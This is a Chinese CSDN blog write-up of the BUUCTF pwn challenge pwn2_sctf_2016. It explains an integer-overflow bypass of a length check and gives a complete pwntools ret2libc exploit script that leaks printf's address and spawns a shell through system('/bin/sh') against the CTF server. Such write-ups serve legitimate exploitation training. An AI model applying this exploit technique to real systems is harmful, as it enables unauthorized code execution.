BUUCTF-pwn2_sctf_2016(整数溢出+泄露libc)

最新推荐文章于 2023-04-18 19:24:54 发布
最新推荐文章于 2023-04-18 19:24:54 发布
阅读量496 收藏 1
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/119332720
版权

在这里插入图片描述32位开启了nx保护
在这里插入图片描述
在这里插入图片描述没有看到system和‘/bin/sh’,开启了NX保护,是泄露libc类型的题目

main函数就调用了一个vuln函数
在这里插入图片描述7行的输入函数不是get,是程序自定义的函数get_n
在这里插入图片描述在这里插入图片描述

a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。也就是说我们这边可以输入负数来达到溢出的效果(整数溢出)

一开始输入负数,绕过长度限制,造成溢出
利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址
溢出覆盖返回地址去执行system(‘/bin/sh’)

from pwn import *

from LibcSearcher import *



r=remote('node4.buuoj.cn',28296)

elf=ELF('./pwn2_sctf_2016')



printf_plt=elf.plt['printf']

printf_got=elf.got['printf']

main=elf.sym['main']



r.recvuntil('How many bytes do you want me to read? ')

r.sendline('-1')#在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了4294967295。使得我们能够进行缓冲区溢出攻击

r.recvuntil('\n')

payload='a'*(0x2c+4)+p32(printf_plt)+p32(main)+p32(printf_got)

r.sendline(payload)

r.recvuntil('\n')

printf_addr=u32(r.recv(4))

libc=LibcSearcher('printf',printf_addr)#泄露libc



offset=printf_addr-libc.dump('printf')#计算system和bin/sh的地址

system=offset+libc.dump('system')

bin_sh=offset+libc.dump('str_bin_sh')



r.recvuntil('How many bytes do you want me to read? ')

r.sendline('-1')

r.recvuntil('\n')

payload='a'*(0x2c+4)+p32(system)+p32(main)+p32(bin_sh)#覆盖返回地址为system(‘/bin/sh’)

r.sendline(payload)



r.interactive()

有多个匹配的libc版本,选个合适的就行

在这里插入图片描述

半岛铁盒@
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTF--pwn--jarvisoj_level3_x64【ret2libc_64】
qq_73149934的博客
12-05 554
BUUCTF--pwn--jarvisoj_level3_x64
[PWN] BUUCTF pwn2_sctf_2016(整数溢出+泄露libc)
空城惜梦的博客
06-05 699
[PWN] BUUCTF pwn2_sctf_2016解题分析漏洞利用payload分析payload1payload2 解题分析 按照惯例先checksec,开了nx保护和部分RELRO 接着运行文件,观察程序的运行逻辑,读入一个长度len然后把输入的字符,再打印输入的Len个字符 32位IDA打开文件,main函数调用了vuln() 发现对输入的长度len做出了限制,len不能大于32 当len>32后,程序将结束,这就导致无法直接溢出 进入get_n函数,发现get_n会接收a2个长度
CTF笔记:溢出利用
PwnGuo的博客
05-19 968
整数溢出 典型整数溢出利用 这个 v3 是一个无符号数,最大只能 255,如果超过的话就会进行 mod 255所以可以传入一个总共是 0x105 的, 这样他的得到的就是 6 是符合长度限制的,从而绕过 if 的检测dest 的大小是 0x11h,加上 ebp 的 0x4h,所以需要在前面填充 0x15h 后门程序 exp: python2 #coding=utf-8 from pwn import * p=remote('node3.buuoj.cn',29748) p.recvuntil("na
pwn刷题num4---整数溢出上溢+栈溢出
tbsqigongzi的博客
04-21 814
攻防世界pwn新手区int_overflow 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 程序运行后让我们选择login(登陆)或exit(退出) 选1,之后输入username(用户名),之后输入passwd(密码),最后只给我们一个success 直接ida看伪代码
32数组溢出怎么解决_从0开始CTFPWN(二)从PWN的HelloWorld栈溢出开始
weixin_42524792的博客
01-09 340
本文为看雪论优秀文章看雪论坛作者ID:dxbaicai一、教程说明上一篇中我们介绍了PWN的基础环境:从0开始CTF-PWN(一)——基础环境准备https://bbs.pediy.com/thread-259199.htm本篇会从PWN的HelloWorld——栈溢出漏洞开始,进行新手教程,由于我也是刚学习,所以理解上也是从新手的角度出发的,一些理解不到位的地方,恳请各位大神指正,我会...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
pwn刷题num25---- strncmp绕过 + 整数溢出 + ret2libc
tbsqigongzi的博客
04-26 1035
BUUCTF-PWN-[OGeek2019]babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后,先让我们输入name,又让我们输入密码, ida一下看一下主函数 首先调用一个sub_80486BB()函数· 一些打初始化的操作 然后打开了一个文
CTF|pwn溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2203
CTF|pwn溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
pwn2_sctf_2016
z1r0的博客
12-06 688
pwn2_sctf_2016 查看保护 这里的int给转换成了无符号的,输入-1的时候,值会变得很大,整型溢出。ret2libc即可 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25828) else: r = process(file_name)
[BUUCTF-pwn]——pwn2_sctf_2016
Y_peak的博客
02-12 504
[BUUCTF-pwn]——pwn2_sctf_2016 题目地址: https://buuoj.cn/challenges#pwn2_sctf_2016 老规矩还是先checksec一下, 在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。 最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。 思路 利用printf泄露printf的实际地址, 通过计算偏移,以此
【CTF】pwn2_sctf_2016
凉水的博客
07-16 882
pwn2_sctf_2016
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 323
BUUCTF 做题练习
BUUCTF-PWN刷题记录-24 & libc-2.29学习(下)
weixin_44145820的博客
05-29 1012
目录[2020 新春红包题]3 [2020 新春红包题]3
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 656
pwn 64位 泄露libc版本
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2492
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值